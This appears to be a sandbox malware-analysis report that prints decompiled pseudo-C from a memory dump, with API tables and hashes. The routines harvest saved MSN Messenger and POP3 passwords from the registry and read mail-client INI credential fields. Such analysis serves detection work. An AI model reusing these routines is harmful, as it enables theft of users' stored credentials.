                                                  0x00401b5c
                                                  0x00401b63
                                                  0x00401b67
                                                  0x00401b68
                                                  0x00401b72
                                                  0x00401b6a
                                                  0x00401b6a
                                                  0x00401b6a
                                                  0x00401b6a
                                                  0x00000000
                                                  0x00401b68
                                                  0x00401b0e
                                                  0x00401b16
                                                  0x00401bd3
                                                  0x00401bd7
                                                  0x00401bdd
                                                  0x00401bdd
                                                  0x00401bdd
                                                  0x00401be1
                                                  0x00401be2
                                                  0x00401aa4
                                                  0x00401bf2
                                                  0x00401bf6
                                                  0x00401bf7
                                                  0x00401bf9
                                                  0x00401bf9
                                                  0x00401c01
                                                  0x00401c03
                                                  0x00401c03
                                                  0x00401c0b
                                                  0x00401c0d
                                                  0x00401c0d
                                                  0x00401c16
                                                  0x00401c18
                                                  0x00401c18
                                                  0x00401c21
                                                  0x00401c23
                                                  0x00401c23
                                                  0x00401c2c
                                                  0x00401c2e
                                                  0x00401c2e
                                                  0x00401c37
                                                  0x00401c83
                                                  0x00401c89
                                                  0x00401c8e
                                                  0x00401c8f
                                                  0x00401c39
                                                  0x00401c39
                                                  0x00401c3d
                                                  0x00401c3e
                                                  0x00401c3f
                                                  0x00401c42
                                                  0x00401c47
                                                  0x00401c51
                                                  0x00401c54
                                                  0x00401c5d
                                                  0x00401c67
                                                  0x00401c6b
                                                  0x00401c6f
                                                  0x00401c75
                                                  0x00401c7a
                                                  0x00401c7b
                                                  0x00401c7b
                                                  0x00401c96

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: free$strlen
                                                  • String ID:
                                                  • API String ID: 667451143-3916222277
                                                  • Opcode ID: 37bb09f8b96ce6c60aa0d5a3bd89c5871ef181f1a1b83bd216632f6d31a5aab6
                                                  • Instruction ID: 06eee62d74eb4b55ebb23f84067d794473d6c8b6021198aa51b9bcc42ccbae70
                                                  • Opcode Fuzzy Hash: 37bb09f8b96ce6c60aa0d5a3bd89c5871ef181f1a1b83bd216632f6d31a5aab6
                                                  • Instruction Fuzzy Hash: DA6178704083859FDB249F26948046BBBF1FB85315F54997FF5D2A22A1E738E8468B0B
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040D4A6, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 94registryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040D4A6(char* __ebx, void** _a4) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				char* _v28;
				char _v32;
				char _v556;
				char _v557;
				char _v1578;
				void _v1580;
				void* __edi;
				void* __esi;
				long _t39;
				int _t43;
				char _t48;
				char* _t63;
				int* _t67;

				_t63 = __ebx;
				_t67 = 0;
				_v16 = 0;
				_v12 = 0x400;
				_t39 = RegQueryValueExA( *_a4, "Password.NET Messenger Service", 0, 0,  &_v1580,  &_v12);
				if(_t39 != 0) {
					L13:
					RegCloseKey( *_a4);
					return _v16;
				}
				_t43 = _t39 + 1;
				if(_v12 <= _t43) {
					goto L13;
				}
				_t74 = _v1580 - 0x20;
				_v8 = 0;
				if(_v1580 >= 0x20) {
					_v8 = _t43;
					L10:
					if(_v8 != _t67) {
						_v557 = 0;
						E00401380( &_v1580,  &(_t63[0x100]), 0xff);
						_v8 = 0xff;
						_t48 = RegQueryValueExA( *_a4, "User.NET Messenger Service", 0, 0, _t63,  &_v8);
						if(_t48 == 0) {
							_t63[0xfe] = _t48;
							_t63[0x1fe] = _t48;
							_v16 = 1;
						}
					}
					goto L13;
				}
				_t69 =  &_v556;
				E004046D7( &_v556);
				if(E004047A0(_t69, _t74) == 0) {
					L8:
					E004047F1( &_v556);
					_t67 = 0;
					goto L10;
				}
				_v32 = _v12 + 0xfffffffe;
				_v28 =  &_v1578;
				if(E00404811(_t69,  &_v32, 0,  &_v24) == 0) {
					goto L8;
				}
				if(_v24 < 0x400) {
					memcpy( &_v1580, _v20, _v24);
					_v8 = 1;
				}
				LocalFree(_v20);
				goto L8;
			}





















                                                  0x0040d4a6
                                                  0x0040d4bf
                                                  0x0040d4cf
                                                  0x0040d4d2
                                                  0x0040d4d5
                                                  0x0040d4dd
                                                  0x0040d5c7
                                                  0x0040d5cc
                                                  0x0040d5d8
                                                  0x0040d5d8
                                                  0x0040d4e3
                                                  0x0040d4e7
                                                  0x00000000
                                                  0x00000000
                                                  0x0040d4ed
                                                  0x0040d4f4
                                                  0x0040d4f7
                                                  0x0040d56d
                                                  0x0040d570
                                                  0x0040d573
                                                  0x0040d587
                                                  0x0040d58e
                                                  0x0040d5a7
                                                  0x0040d5aa
                                                  0x0040d5b2
                                                  0x0040d5b4
                                                  0x0040d5ba
                                                  0x0040d5c0
                                                  0x0040d5c0
                                                  0x0040d5b2
                                                  0x00000000
                                                  0x0040d573
                                                  0x0040d4f9
                                                  0x0040d4ff
                                                  0x0040d50b
                                                  0x0040d55e
                                                  0x0040d564
                                                  0x0040d569
                                                  0x00000000
                                                  0x0040d569
                                                  0x0040d513
                                                  0x0040d51c
                                                  0x0040d532
                                                  0x00000000
                                                  0x00000000
                                                  0x0040d537
                                                  0x0040d546
                                                  0x0040d54e
                                                  0x0040d54e
                                                  0x0040d558
                                                  0x00000000

                                                  APIs
                                                  • RegQueryValueExA.ADVAPI32(?,Password.NET Messenger Service,00000000,00000000,?,?,80000001,75D6F420), ref: 0040D4D5
                                                  • RegQueryValueExA.ADVAPI32(?,User.NET Messenger Service,00000000,00000000,?,?), ref: 0040D5AA
                                                    • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                    • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,75D6F420), ref: 004047A8
                                                    • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                  • memcpy.MSVCRT ref: 0040D546
                                                  • LocalFree.KERNEL32(?,?,00000000,?), ref: 0040D558
                                                  • RegCloseKey.ADVAPI32(?), ref: 0040D5CC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpystrcpy
                                                  • String ID: $Password.NET Messenger Service$User.NET Messenger Service
                                                  • API String ID: 3289975857-105384665
                                                  • Opcode ID: d83e2ebe096d5bcd78dc6c5e473717e98c5fc49575dad68c24a229f0531786f0
                                                  • Instruction ID: 7f1cec63b8765f81c3836bbc11e71f1516ceea0880c28a2d93855dc55ce36bd3
                                                  • Opcode Fuzzy Hash: d83e2ebe096d5bcd78dc6c5e473717e98c5fc49575dad68c24a229f0531786f0
                                                  • Instruction Fuzzy Hash: AE314DB1D01219AFDB11DF94CC44BDEBBB9AF48318F1040B6E905B7290D6789B94CF99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040706C, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 90COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 89%
                                                  			E0040706C(void* __ecx, intOrPtr* _a4, intOrPtr _a8, char _a12) {
				char _v12;
				short* _v16;
				char _v20;
				char* _v24;
				char _v28;
				char _v288;
				char _v544;
				char _v800;
				char _v1056;
				char _v1584;
				void _v2607;
				char _v2608;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t36;
				void* _t63;
				char* _t66;
				void* _t68;

				_t63 = __ecx;
				_v2608 = 0;
				memset( &_v2607, 0, 0x3ff);
				_v12 = 0x400;
				_v1056 = 0;
				_v800 = 0;
				_v544 = 0;
				_v288 = 0;
				_t36 = E0040EBA3(_t63, _a8, "POP3_credentials",  &_v2608,  &_v12);
				_t72 = _t36;
				if(_t36 != 0) {
					return _t36;
				}
				_t67 =  &_v1584;
				E004046D7( &_v1584);
				if(E004047A0( &_v1584, _t72) != 0) {
					_v24 =  &_v2608;
					_v28 = _v12;
					_t16 =  &_v20; // 0x407221
					if(E00404811(_t67,  &_v28, 0, _t16) != 0) {
						_t19 =  &_v20; // 0x407221
						 *((char*)(_t68 + WideCharToMultiByte(0, 0, _v16,  *_t19 >> 1,  &_v544, 0xfd, 0, 0) - 0x21c)) = 0;
						LocalFree(_v16);
						E0040EB80(0xff, _t63, _a8, "POP3_name",  &_v800);
						E0040EB80(0xff, _t63, _a8, "POP3_host",  &_v288);
						_t28 =  &_a12; // 0x407221
						_t66 =  &_v1056;
						E004060D0(0xff, _t66,  *_t28);
						 *((intOrPtr*)( *_a4))(_t66);
					}
				}
				return E004047F1( &_v1584);
			}






















                                                  0x0040706c
                                                  0x00407087
                                                  0x0040708d
                                                  0x004070a5
                                                  0x004070ac
                                                  0x004070b2
                                                  0x004070b8
                                                  0x004070be
                                                  0x004070c4
                                                  0x004070cc
                                                  0x004070ce
                                                  0x00407199
                                                  0x00407199
                                                  0x004070d4
                                                  0x004070da
                                                  0x004070e6
                                                  0x004070f2
                                                  0x004070f8
                                                  0x004070fb
                                                  0x0040710d
                                                  0x0040711d
                                                  0x00407131
                                                  0x00407138
                                                  0x00407154
                                                  0x0040716a
                                                  0x0040716f
                                                  0x00407172
                                                  0x00407178
                                                  0x00407188
                                                  0x00407188
                                                  0x0040710d
                                                  0x00000000

                                                  APIs
                                                  • memset.MSVCRT ref: 0040708D
                                                    • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                    • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                    • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,75D6F420), ref: 004047A8
                                                    • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,!r@,?,000000FD,00000000,00000000,?,00000000,!r@,?,?,?,?,00000000), ref: 00407128
                                                  • LocalFree.KERNEL32(?,?,?,?,?,00000000,75D6ED80,?), ref: 00407138
                                                    • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                    • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                    • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWidememcpymemsetstrcpystrlen
                                                  • String ID: !r@$!r@$POP3_credentials$POP3_host$POP3_name
                                                  • API String ID: 604216836-250559020
                                                  • Opcode ID: 88d4546f94300e18eb63e1a28018ddb3fc5fe9f294d301ab42fb72424ac45106
                                                  • Instruction ID: f8ca724a3b3a12fba31c48434a973b8369f3aae8d57bdfed2f45406e53e98f37
                                                  • Opcode Fuzzy Hash: 88d4546f94300e18eb63e1a28018ddb3fc5fe9f294d301ab42fb72424ac45106
                                                  • Instruction Fuzzy Hash: C331707194021CAFDB11EB698C81ADE7BBCEF19344F0084B6FA05A2281D6389B598F65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405E46, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52stringlibrarywindowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E00405E46(long __edi, char* _a4) {
				char _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t1 = _t24 - 0x834; // -2100
				_t8 = 0;
				_t14 = 0x1100;
				if(_t1 <= 0x383) {
					_t8 = LoadLibraryExA("netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageA(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = strcpy(_a4, "Unknown Error");
				} else {
					if(strlen(_v8) < 0x400) {
						strcpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}








                                                  0x00405e46
                                                  0x00405e4c
                                                  0x00405e54
                                                  0x00405e5c
                                                  0x00405e61
                                                  0x00405e6b
                                                  0x00405e73
                                                  0x00405e75
                                                  0x00405e75
                                                  0x00405e73
                                                  0x00405e91
                                                  0x00405ec0
                                                  0x00405e93
                                                  0x00405e9e
                                                  0x00405ea6
                                                  0x00405eac
                                                  0x00405eb0
                                                  0x00405eb0
                                                  0x00405eca

                                                  APIs
                                                  • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00405F65,?,?), ref: 00405E6B
                                                  • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00405F65,?,?), ref: 00405E89
                                                  • strlen.MSVCRT ref: 00405E96
                                                  • strcpy.MSVCRT(?,?,?,?,00405F65,?,?), ref: 00405EA6
                                                  • LocalFree.KERNEL32(?,?,?,00405F65,?,?), ref: 00405EB0
                                                  • strcpy.MSVCRT(?,Unknown Error,?,?,00405F65,?,?), ref: 00405EC0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strcpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                  • String ID: Unknown Error$netmsg.dll
                                                  • API String ID: 3198317522-572158859
                                                  • Opcode ID: be691a346cef5d5e24c515aac1ca35402bb88184c6041fe02f13b1b1e364655c
                                                  • Instruction ID: 3a45a8761f4bc18c8cc8ce1e33cdf84813ecacbbbbff7bb38409c5e389e3efd7
                                                  • Opcode Fuzzy Hash: be691a346cef5d5e24c515aac1ca35402bb88184c6041fe02f13b1b1e364655c
                                                  • Instruction Fuzzy Hash: A901B131604118BAE7155B61ED46EDF7E6DDB14792B20443AF602F00A0DA785F409A98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040875C, Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 157COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E0040875C(void* __eax, void* __eflags, signed int _a4, short _a8) {
				char _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t96;
				signed int _t98;
				void* _t99;
				signed int _t104;
				signed short _t107;
				signed int _t110;
				intOrPtr _t114;
				signed int _t117;
				signed int _t119;
				signed short _t121;
				signed int _t122;
				signed int _t152;
				signed int _t156;
				signed int _t158;
				signed int _t161;
				signed int _t163;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				void* _t172;
				void* _t173;
				void* _t174;
				void* _t178;
				intOrPtr _t180;

				_t174 = __eflags;
				_t172 = __eax;
				E00408572(__eax);
				 *(_t172 + 0x2c) =  *(_t172 + 0x2c) & 0x00000000;
				_t122 = 0xd;
				 *((intOrPtr*)(_t172 + 0x184)) = _a4;
				_t156 = 0x14;
				_t96 = _t122 * _t156;
				 *(_t172 + 0x1b0) = _t122;
				_push( ~(0 | _t174 > 0x00000000) | _t96);
				L004115D0();
				 *(_t172 + 0x1b4) = _t96;
				_t158 = 0x10;
				_t98 = _t122 * _t158;
				_push( ~(0 | _t174 > 0x00000000) | _t98);
				L004115D0();
				 *(_t172 + 0x34) = _t98;
				_v8 = 0x4168e0;
				do {
					_t21 =  &_v8; // 0x4168e0
					_t99 =  *_t21;
					_t168 =  *_t99;
					_v12 = _t168;
					_t169 = _t168 * 0x14;
					memcpy( *(_t172 + 0x1b4) + _t169, _t99, 0x14);
					_t24 =  &_v8; // 0x4168e0
					_t104 = _v12 << 4;
					_v12 = _t104;
					memcpy( *(_t172 + 0x34) + _t104,  *_t24 + 0x14, 0x10);
					_t107 =  *(_t169 +  *(_t172 + 0x1b4) + 0x10);
					_t173 = _t173 + 0x18;
					_v16 = _t107;
					 *((intOrPtr*)( *(_t172 + 0x34) + _v12 + 0xc)) = _t107;
					if((_t107 & 0xffff0000) == 0) {
						 *(_t169 +  *(_t172 + 0x1b4) + 0x10) = E004078FF(_t107 & 0x0000ffff);
						_t121 = E004078FF(_v16 | 0x00010000);
						 *( *(_t172 + 0x34) + _v12 + 0xc) = _t121;
						_t122 = 0xd;
					}
					_v8 = _v8 + 0x24;
					_t178 = _v8 - 0x416ab4;
				} while (_t178 < 0);
				 *(_t172 + 0x38) =  *(_t172 + 0x38) & 0x00000000;
				 *((intOrPtr*)(_t172 + 0x3c)) = _a8;
				_t161 = 4;
				_t110 = _t122 * _t161;
				 *(_t172 + 0x20) = _t122;
				 *((intOrPtr*)(_t172 + 0x1c)) = 0x20;
				_push( ~(0 | _t178 > 0x00000000) | _t110);
				L004115D0();
				_push(0xc);
				 *(_t172 + 0x24) = _t110;
				L004115D0();
				_t170 = _t110;
				if(_t170 == 0) {
					_t170 = 0;
					__eflags = 0;
				} else {
					_t114 =  *((intOrPtr*)(_t172 + 0x48));
					_t180 = _t114;
					_a8 = _t114;
					if(_t180 == 0) {
						_a8 = 0x64;
					}
					 *((intOrPtr*)(_t170 + 8)) = _a4;
					_t163 = 4;
					_t117 = _t122 * _t163;
					 *(_t170 + 4) = _t122;
					_push( ~(0 | _t180 > 0x00000000) | _t117);
					L004115D0();
					_a4 = _a4 & 0x00000000;
					 *_t170 = _t117;
					do {
						_t152 = _a4;
						_t119 = _t152 << 2;
						_a4 = _a4 + 1;
						 *( *_t170 + _t119 + 2) = _t152;
						 *((short*)(_t119 +  *_t170)) = _a8;
					} while (_a4 < _t122);
				}
				 *(_t172 + 0x19c) =  *(_t172 + 0x19c) & 0x00000000;
				 *(_t172 + 0x1a0) = _t170;
				 *((intOrPtr*)(_t172 + 0x40)) = 1;
				 *((intOrPtr*)(_t172 + 0x198)) = 1;
				 *((intOrPtr*)(_t172 + 0x1a4)) = 1;
				 *((intOrPtr*)(_t172 + 0x1a8)) = 1;
				 *((intOrPtr*)(_t172 + 0x1c4)) = 0x32;
				return E004086DC(_t172);
			}

































                                                  0x0040875c
                                                  0x00408765
                                                  0x00408767
                                                  0x0040876f
                                                  0x00408775
                                                  0x00408776
                                                  0x00408780
                                                  0x00408783
                                                  0x00408788
                                                  0x00408792
                                                  0x00408793
                                                  0x00408798
                                                  0x004087a2
                                                  0x004087a5
                                                  0x004087ae
                                                  0x004087af
                                                  0x004087b6
                                                  0x004087b9
                                                  0x004087c0
                                                  0x004087c0
                                                  0x004087c0
                                                  0x004087c3
                                                  0x004087c5
                                                  0x004087c8
                                                  0x004087d7
                                                  0x004087dc
                                                  0x004087eb
                                                  0x004087f1
                                                  0x004087f4
                                                  0x004087ff
                                                  0x00408809
                                                  0x00408811
                                                  0x00408814
                                                  0x00408818
                                                  0x00408831
                                                  0x00408835
                                                  0x00408842
                                                  0x00408846
                                                  0x00408846
                                                  0x00408847
                                                  0x0040884b
                                                  0x0040884b
                                                  0x0040885b
                                                  0x0040885f
                                                  0x00408866
                                                  0x00408869
                                                  0x0040886e
                                                  0x00408871
                                                  0x0040887c
                                                  0x0040887d
                                                  0x00408882
                                                  0x00408884
                                                  0x00408887
                                                  0x0040888c
                                                  0x00408892
                                                  0x004088ee
                                                  0x004088ee
                                                  0x00408894
                                                  0x00408894
                                                  0x00408897
                                                  0x00408899
                                                  0x0040889c
                                                  0x0040889e
                                                  0x0040889e
                                                  0x004088a8
                                                  0x004088af
                                                  0x004088b2
                                                  0x004088b7
                                                  0x004088be
                                                  0x004088bf
                                                  0x004088c4
                                                  0x004088c9
                                                  0x004088cb
                                                  0x004088cb
                                                  0x004088d2
                                                  0x004088d5
                                                  0x004088db
                                                  0x004088e6
                                                  0x004088e6
                                                  0x004088ec
                                                  0x004088f0
                                                  0x004088fa
                                                  0x00408902
                                                  0x00408905
                                                  0x0040890b
                                                  0x00408911
                                                  0x00408917
                                                  0x0040892a

                                                  APIs
                                                    • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040857E
                                                    • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040858C
                                                    • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040859D
                                                    • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085B4
                                                    • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085BD
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00408793
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004087AF
                                                  • memcpy.MSVCRT ref: 004087D7
                                                  • memcpy.MSVCRT ref: 004087F4
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040887D
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00408887
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004088BF
                                                    • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                    • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                    • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,74B04DE0), ref: 0040797A
                                                    • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@??3@$memcpy$LoadStringstrcpystrlen
                                                  • String ID: d$hA
                                                  • API String ID: 3781940870-4030989184
                                                  • Opcode ID: 6c64bdb5196202114d018d6502db394b3a43eca9dd46e983fc9d5c63418de248
                                                  • Instruction ID: 2ee817cab8fb9d662dc1fdc17dcda2a390100e1008d8253a008a3d74f0a2914d
                                                  • Opcode Fuzzy Hash: 6c64bdb5196202114d018d6502db394b3a43eca9dd46e983fc9d5c63418de248
                                                  • Instruction Fuzzy Hash: 76518D72A01704AFDB24DF2AC582B9AB7E5FF48354F10852EE54ADB391EB74E940CB44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040314D, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 67%
                                                  			E0040314D(void* __eax, intOrPtr _a4, char* _a8) {
				signed int _v8;
				intOrPtr _v12;
				char _v188;
				char _v268;
				char _v524;
				void* __ebx;
				void* __edi;
				char* _t53;
				void* _t60;
				void* _t65;
				char* _t70;

				_v8 = _v8 & 0x00000000;
				_t65 = __eax;
				 *((intOrPtr*)(__eax + 0x8c)) = 3;
				 *((intOrPtr*)(__eax + 0x210)) = 1;
				E0040311F(_a4, "UsesIMAP",  &_v524, 0xff, _a8);
				if(_v524 == 0x31) {
					 *((intOrPtr*)(_t65 + 0x210)) = 2;
				}
				_v12 = _t65 + 0x110;
				E0040311F(_a4, "PopServer", _t65 + 0x110, 0x7f, _a8);
				_t70 = _t65 + 0x214;
				E0040311F(_a4, "LoginName", _t70, 0x7f, _a8);
				E0040311F(_a4, "RealName", _t65 + 0xc, 0x7f, _a8);
				E0040311F(_a4, "ReturnAddress", _t65 + 0x90, 0x7f, _a8);
				E0040311F(_a4, "SavePasswordText",  &_v268, 0xff, _a8);
				if(_v268 != 0) {
					_v188 = 0;
					E00401D5A( &_v268, _t65 + 0x294);
					if( *_t70 == 0) {
						_push(_a8);
						_t60 = 0x7f;
						_push(_t60);
						_push(_t70);
						_push("PopAccount");
						_push(_a4);
						E0040311F();
						if( *_t70 != 0) {
							_t53 = strchr(_t70, 0x40);
							_a8 = _t53;
							if(_t53 != 0) {
								E004060D0(_t60, _v12,  &(_t53[1]));
								 *_a8 = 0;
							}
						}
					}
					_v8 = 1;
				}
				if( *_t70 != 0) {
					_v8 = 1;
				}
				return _v8;
			}














                                                  0x00403156
                                                  0x00403160
                                                  0x00403177
                                                  0x00403181
                                                  0x0040318b
                                                  0x00403197
                                                  0x00403199
                                                  0x00403199
                                                  0x004031b7
                                                  0x004031ba
                                                  0x004031c2
                                                  0x004031d3
                                                  0x004031e9
                                                  0x00403202
                                                  0x0040321a
                                                  0x00403226
                                                  0x00403234
                                                  0x0040323b
                                                  0x00403243
                                                  0x00403245
                                                  0x0040324a
                                                  0x0040324b
                                                  0x0040324c
                                                  0x0040324d
                                                  0x00403252
                                                  0x00403255
                                                  0x0040325d
                                                  0x00403262
                                                  0x0040326b
                                                  0x0040326e
                                                  0x00403275
                                                  0x0040327e
                                                  0x0040327e
                                                  0x0040326e
                                                  0x0040325d
                                                  0x00403281
                                                  0x00403281
                                                  0x0040328e
                                                  0x00403290
                                                  0x00403290
                                                  0x0040329b

                                                  APIs
                                                    • Part of subcall function 0040311F: GetPrivateProfileStringA.KERNEL32(00000000,?,Function_00012466,?,?,?), ref: 00403143
                                                  • strchr.MSVCRT ref: 00403262
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PrivateProfileStringstrchr
                                                  • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                  • API String ID: 1348940319-1729847305
                                                  • Opcode ID: cc26f5bc1b7aaf2e570deba64efa3e2944f8347bda1c61efbd6a62b24a137412
                                                  • Instruction ID: 1cfb9ddeec5dd782170234712f417fe000b4b626ad5f21becf6162a2306db812
                                                  • Opcode Fuzzy Hash: cc26f5bc1b7aaf2e570deba64efa3e2944f8347bda1c61efbd6a62b24a137412
                                                  • Instruction Fuzzy Hash: 7631B370A04209BEEF119F20CC06FD97F6CAF14318F10816AF95C7A1D2C7B95B958B54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040F09D, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 16%
                                                  			E0040F09D(char* __eax, void* __ecx) {
				void* _t2;
				char* _t3;
				void* _t5;
				void* _t6;
				void* _t7;

				_t3 = __eax;
				_t6 = __ecx;
				_t5 = 4;
				while(1) {
					_t2 =  *_t3;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t5);
					_push("&lt;");
					L14:
					_t2 = memcpy(_t6, ??, ??);
					_t7 = _t7 + 0xc;
					_t6 = _t6 + _t5;
					L16:
					if( *_t3 != 0) {
						_t3 = _t3 + 1;
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if(_t2 != 0xb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t6 = _t2;
										_t6 = _t6 + 1;
									} else {
										_push(_t5);
										_push("<br>");
										goto L14;
									}
								} else {
									_push(5);
									_push("&amp;");
									goto L11;
								}
							} else {
								_push(5);
								_push("&deg;");
								L11:
								_t2 = memcpy(_t6, ??, ??);
								_t7 = _t7 + 0xc;
								_t6 = _t6 + 5;
							}
						} else {
							_t2 = memcpy(_t6, "&quot;", 6);
							_t7 = _t7 + 0xc;
							_t6 = _t6 + 6;
						}
					} else {
						_push(_t5);
						_push("&gt;");
						goto L14;
					}
					goto L16;
				}
			}








                                                  0x0040f0a2
                                                  0x0040f0a4
                                                  0x0040f0a6
                                                  0x0040f0a7
                                                  0x0040f0a7
                                                  0x0040f0ab
                                                  0x00000000
                                                  0x00000000
                                                  0x0040f0ad
                                                  0x0040f0ae
                                                  0x0040f10a
                                                  0x0040f10b
                                                  0x0040f110
                                                  0x0040f113
                                                  0x0040f11a
                                                  0x0040f11d
                                                  0x0040f11f
                                                  0x00000000
                                                  0x0040f11f
                                                  0x0040f125
                                                  0x0040f0b5
                                                  0x0040f0b7
                                                  0x0040f0c3
                                                  0x0040f0dc
                                                  0x0040f0e9
                                                  0x0040f102
                                                  0x0040f117
                                                  0x0040f119
                                                  0x0040f104
                                                  0x0040f104
                                                  0x0040f105
                                                  0x00000000
                                                  0x0040f105
                                                  0x0040f0eb
                                                  0x0040f0eb
                                                  0x0040f0ed
                                                  0x00000000
                                                  0x0040f0ed
                                                  0x0040f0de
                                                  0x0040f0de
                                                  0x0040f0e0
                                                  0x0040f0f2
                                                  0x0040f0f3
                                                  0x0040f0f8
                                                  0x0040f0fb
                                                  0x0040f0fb
                                                  0x0040f0c5
                                                  0x0040f0cd
                                                  0x0040f0d2
                                                  0x0040f0d5
                                                  0x0040f0d5
                                                  0x0040f0b9
                                                  0x0040f0b9
                                                  0x0040f0ba
                                                  0x00000000
                                                  0x0040f0ba
                                                  0x00000000
                                                  0x0040f0b7

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
